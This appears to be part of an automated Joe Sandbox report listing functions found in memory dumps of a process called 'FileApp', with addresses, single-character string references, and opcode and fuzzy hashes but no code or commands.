:, xrefs: 05915C4D
N, xrefs: 05915723
S, xrefs: 059150B2
X, xrefs: 0591581F
c, xrefs: 05915535
T, xrefs: 059153A5
a, xrefs: 05915547
P, xrefs: 0591520F
X, xrefs: 05915E61
`, xrefs: 05915C6F
W, xrefs: 05915E17
;, xrefs: 0591527B
@, xrefs: 05915799
_, xrefs: 05915975
, xrefs: 0591539B
6, xrefs: 05915641
[, xrefs: 059157EB
O, xrefs: 05915A99
#, xrefs: 059150DE
8, xrefs: 05915A11
], xrefs: 059159DD
T, xrefs: 05915401
<, xrefs: 05915785
1, xrefs: 059158A5
%, xrefs: 05915323
I, xrefs: 0591591F
=, xrefs: 05915CBF
H, xrefs: 05915285
3, xrefs: 0591540B
>, xrefs: 05915679
<aB, xrefs: 059159F1
J, xrefs: 059150D2
2, xrefs: 05915E2D
T, xrefs: 059156A9
[, xrefs: 059153DF
V, xrefs: 0591509E
O, xrefs: 05915C1B
%, xrefs: 05915B63
`, xrefs: 05915199

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $ $!$!$#$$$%$%$'$(fB$*$,$1$1$2$2$3$6$6$8$:$:$;$;$<$=$>$>$?$@$@$A$B$H$I$J$L$M$N$O$O$P$P$Q$S$T$T$T$T$V$W$X$X$Z$Z$Z$[$[$]$^$_$_$`$`$a$c$<aB
API String ID: 0-999022309
Opcode ID: e38fc233932b4e45982c46717177c4b3f2791d8f682032b9a7033e3d1dd46c9a
Instruction ID: e3e402747872e976f846f96593003e301b7af75335fa0c6b7fabd88510934dcd
Opcode Fuzzy Hash: e38fc233932b4e45982c46717177c4b3f2791d8f682032b9a7033e3d1dd46c9a
Instruction Fuzzy Hash: A7B2B0B0E01629CFEB64CF2ADD4479ABBB5FB89301F0091EAD50CA7250DB795E858F14

Function 05914F20 Relevance: 84.7, Strings: 67, Instructions: 967COMMON

Download Yara Rule

Strings

P, xrefs: 05915801
;, xrefs: 05915453
$, xrefs: 05915141
^, xrefs: 05915C8D
Z, xrefs: 0591557F
?, xrefs: 05915613
', xrefs: 05915E0B
, xrefs: 059154F7
_, xrefs: 05915DE7
A, xrefs: 05915469
:, xrefs: 05915493
(fB, xrefs: 05915CF7
T, xrefs: 05915655
B, xrefs: 05915E43
2, xrefs: 059158D1
Z, xrefs: 05915A6F
Z, xrefs: 0591597F
!, xrefs: 059151AD
!, xrefs: 05915391
,, xrefs: 059152FD
L, xrefs: 059151A3
@, xrefs: 05915130
6, xrefs: 05915DA5
M, xrefs: 05915CB3
Q, xrefs: 05915D67
1, xrefs: 05915A07
>, xrefs: 0591566F
*, xrefs: 05915DBF
:, xrefs: 05915C4D
N, xrefs: 05915723
S, xrefs: 059150B2
X, xrefs: 0591581F
c, xrefs: 05915535
T, xrefs: 059153A5
a, xrefs: 05915547
P, xrefs: 0591520F
X, xrefs: 05915E61
`, xrefs: 05915C6F
W, xrefs: 05915E17
;, xrefs: 0591527B
@, xrefs: 05915799
_, xrefs: 05915975
, xrefs: 0591539B
6, xrefs: 05915641
[, xrefs: 059157EB
O, xrefs: 05915A99
#, xrefs: 059150DE
8, xrefs: 05915A11
], xrefs: 059159DD
T, xrefs: 05915401
<, xrefs: 05915785
1, xrefs: 059158A5
%, xrefs: 05915323
I, xrefs: 0591591F
=, xrefs: 05915CBF
H, xrefs: 05915285
3, xrefs: 0591540B
>, xrefs: 05915679
<aB, xrefs: 059159F1
J, xrefs: 059150D2
2, xrefs: 05915E2D
T, xrefs: 059156A9
[, xrefs: 059153DF
V, xrefs: 0591509E
O, xrefs: 05915C1B
%, xrefs: 05915B63
`, xrefs: 05915199

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $ $!$!$#$$$%$%$'$(fB$*$,$1$1$2$2$3$6$6$8$:$:$;$;$<$=$>$>$?$@$@$A$B$H$I$J$L$M$N$O$O$P$P$Q$S$T$T$T$T$V$W$X$X$Z$Z$Z$[$[$]$^$_$_$`$`$a$c$<aB
API String ID: 0-999022309
Opcode ID: ac43da16a9bcf984344a6df4f7ee0d789811fd5d34fed1399474cef5bc393894
Instruction ID: 0ab9c42335f355158d56003a348c98ff1b2582b6dc91164b4e3144598d375d25
Opcode Fuzzy Hash: ac43da16a9bcf984344a6df4f7ee0d789811fd5d34fed1399474cef5bc393894
Instruction Fuzzy Hash: B5B2B0B0E01629CFEB64CF2ADD4479ABBB5FB89301F0091EAD50CA7250DB794E858F14

Function 05916640 Relevance: 77.2, Strings: 61, Instructions: 988COMMON

Download Yara Rule

Strings

8, xrefs: 05916BD3
A, xrefs: 059168BF
., xrefs: 059176A9
., xrefs: 059176C3
4, xrefs: 05916DF1
., xrefs: 059175BB
S, xrefs: 059168D3
@dgB, xrefs: 05916A5F
M, xrefs: 0591681E
-, xrefs: 05916C55
8, xrefs: 0591688D
8, xrefs: 05916EE9
YQ3B, xrefs: 05916FDB
H, xrefs: 05917349
-, xrefs: 05916D37
Q, xrefs: 0591723B
-, xrefs: 05916A9D
$, xrefs: 05916C11
V, xrefs: 05916CAB
', xrefs: 0591739B
=, xrefs: 0591698D
/kB, xrefs: 0591726F
[, xrefs: 05916B75
T, xrefs: 05916983
a, xrefs: 05916F57
:, xrefs: 0591748D
a, xrefs: 0591725B
, xrefs: 05917355
Y, xrefs: 059170FB
_, xrefs: 05916FA7
T, xrefs: 05916D6D
(, xrefs: 05917227
C, xrefs: 05916E53
>, xrefs: 05916EFF
W, xrefs: 059173DB
IyB, xrefs: 05917467
G, xrefs: 05916CEB
B, xrefs: 05916949
4, xrefs: 05917549
!, xrefs: 05916E13
I, xrefs: 05916BC9
&, xrefs: 05916D8D
l?g@, xrefs: 0591745B
D, xrefs: 059171CF
9A>B, xrefs: 05917605
8, xrefs: 05916DA7
P, xrefs: 05917561
', xrefs: 05916866
2\@, xrefs: 05917325
D, xrefs: 05917651
P, xrefs: 05917361
K, xrefs: 05916A87
B, xrefs: 059169F5
), xrefs: 059173E7
P, xrefs: 05917585
E, xrefs: 05917279
?, xrefs: 05916953
E, xrefs: 05916A45
[7sB, xrefs: 05917499
W, xrefs: 05916EDF
D, xrefs: 05917105

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $!$$$&$'$'$($)$-$-$-$.$.$.$/kB$4$4$8$8$8$8$9A>B$:$=$>$?$@dgB$A$B$B$C$D$D$D$E$E$G$H$I$IyB$K$M$P$P$P$Q$S$T$T$V$W$W$Y$YQ3B$[$[7sB$_$a$a$l?g@$2\@
API String ID: 0-1098073836
Opcode ID: d24874d0a0305992ac50681b13ee1e14a119ebb5e7273e4a4a11a916d5da20dd
Instruction ID: b6fa998c15f27b7df05d83785226daf63e0055bc7856becb7036e425f1ffb542
Opcode Fuzzy Hash: d24874d0a0305992ac50681b13ee1e14a119ebb5e7273e4a4a11a916d5da20dd
Instruction Fuzzy Hash: D9B2C1B0E416298FEB64CF2ADD4479ABBB6FB89301F0090E9D50CA7251E7794E858F14

Function 05916680 Relevance: 77.2, Strings: 61, Instructions: 950COMMON

Download Yara Rule

Strings

8, xrefs: 05916BD3
A, xrefs: 059168BF
., xrefs: 059176A9
., xrefs: 059176C3
4, xrefs: 05916DF1
., xrefs: 059175BB
S, xrefs: 059168D3
@dgB, xrefs: 05916A5F
M, xrefs: 0591681E
-, xrefs: 05916C55
8, xrefs: 0591688D
8, xrefs: 05916EE9
YQ3B, xrefs: 05916FDB
H, xrefs: 05917349
-, xrefs: 05916D37
Q, xrefs: 0591723B
-, xrefs: 05916A9D
$, xrefs: 05916C11
V, xrefs: 05916CAB
', xrefs: 0591739B
=, xrefs: 0591698D
/kB, xrefs: 0591726F
[, xrefs: 05916B75
T, xrefs: 05916983
a, xrefs: 05916F57
:, xrefs: 0591748D
a, xrefs: 0591725B
, xrefs: 05917355
Y, xrefs: 059170FB
_, xrefs: 05916FA7
T, xrefs: 05916D6D
(, xrefs: 05917227
C, xrefs: 05916E53
>, xrefs: 05916EFF
W, xrefs: 059173DB
IyB, xrefs: 05917467
G, xrefs: 05916CEB
B, xrefs: 05916949
4, xrefs: 05917549
!, xrefs: 05916E13
I, xrefs: 05916BC9
&, xrefs: 05916D8D
l?g@, xrefs: 0591745B
D, xrefs: 059171CF
9A>B, xrefs: 05917605
8, xrefs: 05916DA7
P, xrefs: 05917561
', xrefs: 05916866
2\@, xrefs: 05917325
D, xrefs: 05917651
P, xrefs: 05917361
K, xrefs: 05916A87
B, xrefs: 059169F5
), xrefs: 059173E7
P, xrefs: 05917585
E, xrefs: 05917279
?, xrefs: 05916953
E, xrefs: 05916A45
[7sB, xrefs: 05917499
W, xrefs: 05916EDF
D, xrefs: 05917105

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: $!$$$&$'$'$($)$-$-$-$.$.$.$/kB$4$4$8$8$8$8$9A>B$:$=$>$?$@dgB$A$B$B$C$D$D$D$E$E$G$H$I$IyB$K$M$P$P$P$Q$S$T$T$V$W$W$Y$YQ3B$[$[7sB$_$a$a$l?g@$2\@
API String ID: 0-1098073836
Opcode ID: 3b01ef9e0ebc4a80cc84c927e6698d95bd4d2b9cbebc018c7860ec8c486737f7
Instruction ID: 14db557c7413542cbeaee4b8d47319fa8a27767b18f31fdd87c36ed4ad209feb
Opcode Fuzzy Hash: 3b01ef9e0ebc4a80cc84c927e6698d95bd4d2b9cbebc018c7860ec8c486737f7
Instruction Fuzzy Hash: 6BA2B0B0E41629CFEB64CF2ADD4479ABAB6FB89301F0091E9D50CA7250E7794E858F14

Function 0591C89C Relevance: 3.9, Strings: 3, Instructions: 159COMMON

Download Yara Rule

Strings

UUUU, xrefs: 0591C8D7
UUUU, xrefs: 0591C9A1
X$c{, xrefs: 0591CA85

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID: UUUU$UUUU$X$c{
API String ID: 0-153604399
Opcode ID: 688c078d2fd3688d6f36734c8c2048073f7e956d82ae4873cbe6a776b0fc5bd7
Instruction ID: 4f45718c82eea8037977faacfafc90483ea84ceb7c72ae805425a9a78fbbce20
Opcode Fuzzy Hash: 688c078d2fd3688d6f36734c8c2048073f7e956d82ae4873cbe6a776b0fc5bd7
Instruction Fuzzy Hash: A2817EB5E102289FDB64CFA9C981B9DFBF2AF88300F5481A9E54CE7245D7349A858F01

Function 0581DF58 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1261440e5add60710e80ff4f730f33690868070b3bbf9bff93f3e652c5b739d
Instruction ID: 141b0b6db948458e744a2d137b3dccfbbd342fb6ad0df6c402beaf5d0fc4b20e
Opcode Fuzzy Hash: d1261440e5add60710e80ff4f730f33690868070b3bbf9bff93f3e652c5b739d
Instruction Fuzzy Hash: 81229034F042198FDB18EB78885466E7FBBBFC9640B158469EC16EB384DF349C068799

Function 05819DDA Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129752902.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956733d4a8caa18909116815ede361a54183f7b983ee7bf950a77892c2487901
Instruction ID: 0b13bd553e2cd458fa53ee0482a062235d6a73a5a48c79f0af3fe9477da1165d
Opcode Fuzzy Hash: 956733d4a8caa18909116815ede361a54183f7b983ee7bf950a77892c2487901
Instruction Fuzzy Hash: D9C1DF31B05215DFDB29DF28C494A6A7BBABF85300B5584A9DC06DB361CB31EC81CBD9

Function 0591967F Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3d5657922ba6dbcbcae8628b0233efeb9755f88a4ea70aaddc4c853442c781
Instruction ID: 3b1f578565bd9d4bc2cbedf031d4f1e78e857522ecd598b21be5d58c7cb867ff
Opcode Fuzzy Hash: 4e3d5657922ba6dbcbcae8628b0233efeb9755f88a4ea70aaddc4c853442c781
Instruction Fuzzy Hash: 2D515B30A1020ACFEB48DFBAE85569E7FF6FBC8300F049529D505AB255DFB469058F90

Function 05919690 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130120002.0000000005910000.00000040.00000800.00020000.00000000.sdmp, Offset: 05910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5910000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e53e6897d91cbf9da42492e27a9011a3a3606d8b0d2dda0a41365c1efaf503
Instruction ID: 13905cb8c815472ea8750911e229a72e01b87a5ef3c84da522d7c08c95252ce7
Opcode Fuzzy Hash: 06e53e6897d91cbf9da42492e27a9011a3a3606d8b0d2dda0a41365c1efaf503
Instruction Fuzzy Hash: 24515E30A1020ACFEB48DF7AE95569E7FF6FBC8300F009529D505AB265DFB469058F90

Function 030A7AD7 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d788fc37b3be86e114eff766b3553711d4c24157fc2c5141203f656dd903a35
Instruction ID: 265166b9c1fe33c516ee0db812186aa97dfc3ebb3f1a78d913de8e6766bc974e
Opcode Fuzzy Hash: 6d788fc37b3be86e114eff766b3553711d4c24157fc2c5141203f656dd903a35
Instruction Fuzzy Hash: 4C515D70A0120ADFDB49EFB9E89079EBBF2FBC9300F14D569C105AB254EB795805CB80

Function 030A7AE0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953f18ee0b4758f385f42815c698619601d19208081fc7dda59a7e6ebcc71252
Instruction ID: 93e7abfa26caf519206881bd00f556f8cca2c58d33640089fdfa1aaecd6a65ee
Opcode Fuzzy Hash: 953f18ee0b4758f385f42815c698619601d19208081fc7dda59a7e6ebcc71252
Instruction Fuzzy Hash: D0514E70A0120ADFDB49EFB9E89479EBBF2FBC9300F14D569C005AB254EB795805CB90

Function 030A6AD7 Relevance: 11.4, Strings: 9, Instructions: 181COMMON

Download Yara Rule

Strings

:$B, xrefs: 030A6D95
r, xrefs: 030A6B44
S, xrefs: 030A6BA2
&, xrefs: 030A6CAF
$, xrefs: 030A6D0A
G, xrefs: 030A6AD7
], xrefs: 030A6CD3
3, xrefs: 030A6D4D
", xrefs: 030A6CC7

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: "$$$&$3$:$B$G$S$]$r
API String ID: 0-195352637
Opcode ID: 1c7c78584dc27d5a62bba8a6fdd1c4fb441a8afaca328b1da8976b413e3629ac
Instruction ID: d8901bbceaf16efc4bbd0f2b3ed715ac667858864bd433b21ca71c718f960c0e
Opcode Fuzzy Hash: 1c7c78584dc27d5a62bba8a6fdd1c4fb441a8afaca328b1da8976b413e3629ac
Instruction Fuzzy Hash: 277181B4D466698FDB60DF65D944BEAFAB1AF4A341F0060E9D549B3240D7788AC48F08

Function 030A5D67 Relevance: 8.9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

Strings

-, xrefs: 030A5DE3
], xrefs: 030A5E25
&, xrefs: 030A5E01
$, xrefs: 030A5E5C
bXUB, xrefs: 030A5F46
3, xrefs: 030A5E9F
", xrefs: 030A5E19

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: "$$$&$-$3$]$bXUB
API String ID: 0-1696224069
Opcode ID: a45b983dda605f136af4bceea6c68e6b1c5a91df5401fd698c16df0260eaf99a
Instruction ID: 58825023006a303276374dc711e14254714dbb5bd052ee1ac659daf3d7cea419
Opcode Fuzzy Hash: a45b983dda605f136af4bceea6c68e6b1c5a91df5401fd698c16df0260eaf99a
Instruction Fuzzy Hash: 4741C8B8E062298FDB64CF64D944BEABBB0EF5A300F0061E9D519B3741D7748E808F19

Function 030A4479 Relevance: 7.6, Strings: 6, Instructions: 70COMMON

Download Yara Rule

Strings

S, xrefs: 030A44AB
', xrefs: 030A44FB
6, xrefs: 030A45A9
F, xrefs: 030A4544
`, xrefs: 030A454E
>, xrefs: 030A457A

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: '$6$>$F$S$`
API String ID: 0-3970122078
Opcode ID: 58ebce65406dd244fbb2f89ea8eb55df8d2ce8d2b39b4a1a60911d82d3e819a0
Instruction ID: 192e54f919afc324600ed62c1dc3498a0037ad187db4edc6d5157c0c9bd02543
Opcode Fuzzy Hash: 58ebce65406dd244fbb2f89ea8eb55df8d2ce8d2b39b4a1a60911d82d3e819a0
Instruction Fuzzy Hash: E431A3B8D052698FDB64DF29E8487EABAF1AF0A345F0050E9D509B3680D7794EC4CF14

Function 030A2E2A Relevance: 7.6, Strings: 6, Instructions: 59COMMON

Download Yara Rule

Strings

2, xrefs: 030A2EDD
+, xrefs: 030A2F08
t, xrefs: 030A2F13
\, xrefs: 030A2E49
., xrefs: 030A2E9A
>, xrefs: 030A2EA6

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: +$.$2$>$\$t
API String ID: 0-3995427274
Opcode ID: 7e62fd2a4222093fbac07aaec743185cecb2a30f57041e6d2976dc0084c23657
Instruction ID: 9a702a5ce4cfbe0bd021aff72a29a5df5abc1716403522dba8c921c18f810509
Opcode Fuzzy Hash: 7e62fd2a4222093fbac07aaec743185cecb2a30f57041e6d2976dc0084c23657
Instruction Fuzzy Hash: 8D21A9B4C46269CBDB60DF64D944BEABBF4FF06301F00A1E58059B3240DB795AC58F48

Function 030A51C5 Relevance: 6.3, Strings: 5, Instructions: 87COMMON

Download Yara Rule

Strings

O, xrefs: 030A51C5
W, xrefs: 030A530E
., xrefs: 030A5284
3, xrefs: 030A52F7
W, xrefs: 030A521A

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: .$3$O$W$W
API String ID: 0-1280783337
Opcode ID: a8f3d6d166a96da7e4bc561c1e8d94efaf3b4abbd1acb88cf84f07deee4a8cd6
Instruction ID: c2cc471c1fdf7ffe5399bc2683db85e918fdff73f733e9304d01e23de16e5048
Opcode Fuzzy Hash: a8f3d6d166a96da7e4bc561c1e8d94efaf3b4abbd1acb88cf84f07deee4a8cd6
Instruction Fuzzy Hash: 5531A7B4D056298BCB64DF65D9447E9FBB1AF4A341F00A0EAD519B3240E7789EC48F18

Function 030A70D0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

>rmB, xrefs: 030A71A4
W, xrefs: 030A70D0
J, xrefs: 030A719A
J, xrefs: 030A7143
s, xrefs: 030A714D

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: >rmB$J$J$W$s
API String ID: 0-2575363113
Opcode ID: 8257ac8b4c60afd2b37ab1b2ddf04a71b6f9210b391346aac1bcde74148c0c11
Instruction ID: eec181302b710a34742b401d8cb5a7e35fcc5dbd371c077b0ba4d63b74e9895b
Opcode Fuzzy Hash: 8257ac8b4c60afd2b37ab1b2ddf04a71b6f9210b391346aac1bcde74148c0c11
Instruction Fuzzy Hash: DB31DEB4D006698BDB65CF69C9403E8BBFAFF49301F0490EA940CA7251E7395EC08F04

Function 030A56E0 Relevance: 6.3, Strings: 5, Instructions: 38COMMON

Download Yara Rule

Strings

H, xrefs: 030A5769
7, xrefs: 030A5775
P, xrefs: 030A572E
', xrefs: 030A5707
w, xrefs: 030A5738

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: '$7$H$P$w
API String ID: 0-2562345980
Opcode ID: 40a193c433d9156eb26da48ea743d4bf5f86ae39eed9293aa83e6366b43ade8a
Instruction ID: 9eaca0ea6dad3eea632d930f935b465829e86779f89141f813ab6215e9e41cfe
Opcode Fuzzy Hash: 40a193c433d9156eb26da48ea743d4bf5f86ae39eed9293aa83e6366b43ade8a
Instruction Fuzzy Hash: 381190B4D0A2698FDB60DF68D8897DEBBB0AF09305F0021EAD10DB7281D7794AD48F05

Function 030A5B53 Relevance: 5.1, Strings: 4, Instructions: 121COMMON

Download Yara Rule

Strings

), xrefs: 030A5C47
', xrefs: 030A5D0E
+, xrefs: 030A5D56
(, xrefs: 030A5BE5

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: '$($)$+
API String ID: 0-3210913385
Opcode ID: 13a5ba4a2e96c180bd41926c16dd1bf7c40c8f2b222f0626c95049e393c8e535
Instruction ID: 787483312c1699fa49f991dc03b3906cb430e32895f34d9437da70c7629a0adb
Opcode Fuzzy Hash: 13a5ba4a2e96c180bd41926c16dd1bf7c40c8f2b222f0626c95049e393c8e535
Instruction Fuzzy Hash: 7951B3B8D022698FEB64DF69D9447E9BBF1AF8A301F0051EA9449F3241EB744EC48F14

Function 030A23F3 Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

R, xrefs: 030A2528
=, xrefs: 030A2471
c, xrefs: 030A2467
Y, xrefs: 030A2545

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: =$R$Y$c
API String ID: 0-3814210677
Opcode ID: 00e75853a06dbe5ba1dd38bde8fcb8d7888f8998902779e68b75b730a4db89a4
Instruction ID: 5e71d98acad8090f1fca93eef7994b3830eb5823f351b10a2a51828fedc6c012
Opcode Fuzzy Hash: 00e75853a06dbe5ba1dd38bde8fcb8d7888f8998902779e68b75b730a4db89a4
Instruction Fuzzy Hash: 3931AFB8D05629CFDB60DF68E9447E9BAF1EF4A342F0051EA9509E7280E7784EC08F15

Function 030A6FBE Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

z5gB, xrefs: 030A70A8
V, xrefs: 030A7046
B, xrefs: 030A70BF
Q, xrefs: 030A707A

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: B$Q$V$z5gB
API String ID: 0-2122078946
Opcode ID: 38053aca6aa47304d38b3d14a9dbe9eb1278ce93c3e0eccaf193399ff0a598ff
Instruction ID: 6f768f1f1d1f05ab25970b5654328b0b83a881e7d319efce75fcf337accda2e1
Opcode Fuzzy Hash: 38053aca6aa47304d38b3d14a9dbe9eb1278ce93c3e0eccaf193399ff0a598ff
Instruction Fuzzy Hash: E321EEB4E457298BDB60CF25DD00BEAF7B1BB57341F0560E58009B7A40D7798E808F09

Function 030A6EA3 Relevance: 5.1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

Strings

), xrefs: 030A6EF0
@, xrefs: 030A6FAD
9, xrefs: 030A6F6C
O, xrefs: 030A6F21

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: )$9$@$O
API String ID: 0-3204724456
Opcode ID: 1f709db0c83890531fb6020eaf69718818a3089f50317c8f1b4f89ca07f18da4
Instruction ID: 0e28508f2afccb4f36934bc3d727e63ae3a9e4dd6027bc400cfb915042a7075a
Opcode Fuzzy Hash: 1f709db0c83890531fb6020eaf69718818a3089f50317c8f1b4f89ca07f18da4
Instruction Fuzzy Hash: 9021BAB4D062698FEB60DF28D9447EAF6B1BF56341F0460E9D048B3641D7B88EC48F05

Function 030A37D8 Relevance: 5.1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

Strings

m, xrefs: 030A3879
|, xrefs: 030A383E
U, xrefs: 030A38D1
6, xrefs: 030A37D8

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: 6$U$m$|
API String ID: 0-4246074406
Opcode ID: 0a8b6dfde27f89f95b4da2799ce61f049ba78cda596803cec838ff876d134c8a
Instruction ID: c478c3e36bacf2608bf23b7c066ccd770927efd2308271c914ee8aa6c20073e9
Opcode Fuzzy Hash: 0a8b6dfde27f89f95b4da2799ce61f049ba78cda596803cec838ff876d134c8a
Instruction Fuzzy Hash: BA21B7B8D056698BDB60DF68D9447EDBAB1EF4A705F0060E9D149B3280D7784EC4CF08

Function 030A49F0 Relevance: 5.1, Strings: 4, Instructions: 53COMMON

Download Yara Rule

Strings

u, xrefs: 030A4ACA
A, xrefs: 030A4A88
*, xrefs: 030A4A25
HoA, xrefs: 030A4A7C

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: *$A$u$HoA
API String ID: 0-3374009898
Opcode ID: 5844fa02c06dd3409f806162c90307b08a9eedb279f3394f7cb0c7efdbd49da0
Instruction ID: 14f8d79c7b3a090f5d97bb520753cb19728ffa426480b74d1052113738b40c2b
Opcode Fuzzy Hash: 5844fa02c06dd3409f806162c90307b08a9eedb279f3394f7cb0c7efdbd49da0
Instruction Fuzzy Hash: 5321B6B4D026298BCB64CFA5D944BEEFAF1AF4A341F00A0EAC509B3644D7749A81CF14

Function 030A6253 Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

m>B, xrefs: 030A6307
-, xrefs: 030A62BF
-, xrefs: 030A62CB
@, xrefs: 030A6253

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: -$-$@$m>B
API String ID: 0-4088471621
Opcode ID: 55f492b0e7ff8a41924c5a37d35bc986e9c933d8b0ffe98fce608810bb480ab0
Instruction ID: 9c6674c42efee7b777ea699d47de9334e55ecb6fe2bdfef8f5a0eb02819912e0
